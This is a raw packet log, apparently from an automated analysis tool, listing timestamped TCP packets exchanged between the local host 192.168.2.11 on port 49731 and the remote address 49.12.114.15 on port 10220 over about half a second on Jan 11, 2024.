                                                                                                                                                  Jan 11, 2024 13:35:15.069605112 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069653034 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069689989 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069737911 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069777966 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069864035 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.069936037 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069978952 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.069989920 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.070025921 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.070051908 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.070090055 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.070097923 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.070128918 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.070132971 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.070188046 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.070199966 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.070239067 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.070251942 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.070285082 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.257994890 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258028030 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258047104 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258064985 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258109093 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258114100 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258141994 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258152962 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258203030 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258219957 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258250952 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258259058 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258285046 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258341074 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258346081 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258398056 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258434057 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258481979 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258553982 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258598089 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258671999 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258713007 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258764982 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258805037 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258853912 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258893967 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.258941889 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.258959055 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259007931 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259044886 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259083986 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259088039 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259128094 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259133101 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259224892 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259244919 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259288073 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259322882 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259363890 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259383917 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259424925 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259444952 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259478092 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259516001 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259533882 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259576082 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259634018 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259694099 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259732008 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259788036 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259829044 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.259850979 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.259896040 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.260000944 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260061979 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260102034 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.260127068 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260160923 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.260231972 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260272980 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.260309935 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260348082 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.260353088 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260389090 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.260402918 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260436058 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.260456085 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260493994 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.260513067 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260550022 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.260585070 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260648966 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.260670900 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.260731936 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.446650028 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.446672916 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.446707010 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.446738005 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.446763992 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.446765900 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.446784973 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.446826935 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.446839094 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.446873903 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.446882963 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.446914911 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.446966887 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447010040 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447012901 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447053909 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447082043 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447115898 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447133064 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447160006 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447186947 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447220087 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447334051 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447386980 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447407007 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447438955 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447452068 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447480917 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447526932 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447545052 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447602987 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447623014 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447642088 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447668076 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447701931 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447712898 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447741985 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447751999 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447781086 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447804928 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447845936 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447889090 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447935104 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.447951078 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.447994947 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448034048 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448071957 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448113918 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448142052 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448246002 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448285103 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448297024 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448333025 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448355913 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448407888 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448483944 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448574066 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448615074 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448616982 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448653936 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448662043 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448699951 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448726892 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448765039 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448784113 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448802948 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448816061 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448854923 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448877096 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448915005 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448925018 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.448952913 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.448964119 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449008942 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449027061 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449068069 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449105978 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449119091 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449146032 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449158907 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449193001 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449217081 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449255943 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449263096 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449300051 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449326038 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449363947 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449373007 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449415922 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449434042 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449485064 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449502945 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449549913 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449604034 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449641943 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449654102 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449687958 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449747086 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449815989 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449853897 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.449861050 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.449894905 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.451885939 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.451925993 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.451940060 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.451965094 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.451967955 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.452003002 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.452008009 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.452039957 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.452045918 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.452078104 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.452083111 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.452116013 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.452124119 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.452153921 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.452162981 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.452193022 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.452208996 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.452230930 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.452238083 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.452349901 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.452625036 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.452680111 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453016996 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453053951 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453075886 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453090906 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453103065 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453133106 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453149080 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453170061 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453186989 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453207970 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453219891 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453246117 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453253984 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453284025 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453301907 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453320980 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453325033 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453361034 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453362942 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453399897 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453414917 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453438044 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453448057 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453476906 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.453485012 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.453521967 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.635313988 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.635339022 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.635366917 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.635418892 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.635476112 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.635488033 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.635514021 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.635539055 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.635649920 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.635730982 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.635741949 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.635780096 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.635781050 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.635842085 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.635869980 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.635888100 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.635906935 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.635943890 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.636089087 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.636126041 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.636158943 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.636199951 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.636394024 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.636435032 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.636456966 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.636495113 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.636576891 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.636616945 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.636666059 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.636713028 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.636720896 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.636733055 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.636748075 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.636786938 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.636826992 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.636991024 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.637028933 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.637064934 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.637100935 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.637151957 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.637190104 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.637226105 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.637264967 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.637309074 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.637346983 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.637438059 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.637490034 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.638133049 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.638195992 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.638282061 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.638320923 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.638359070 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.638432980 CET4973110220192.168.2.1149.12.114.15
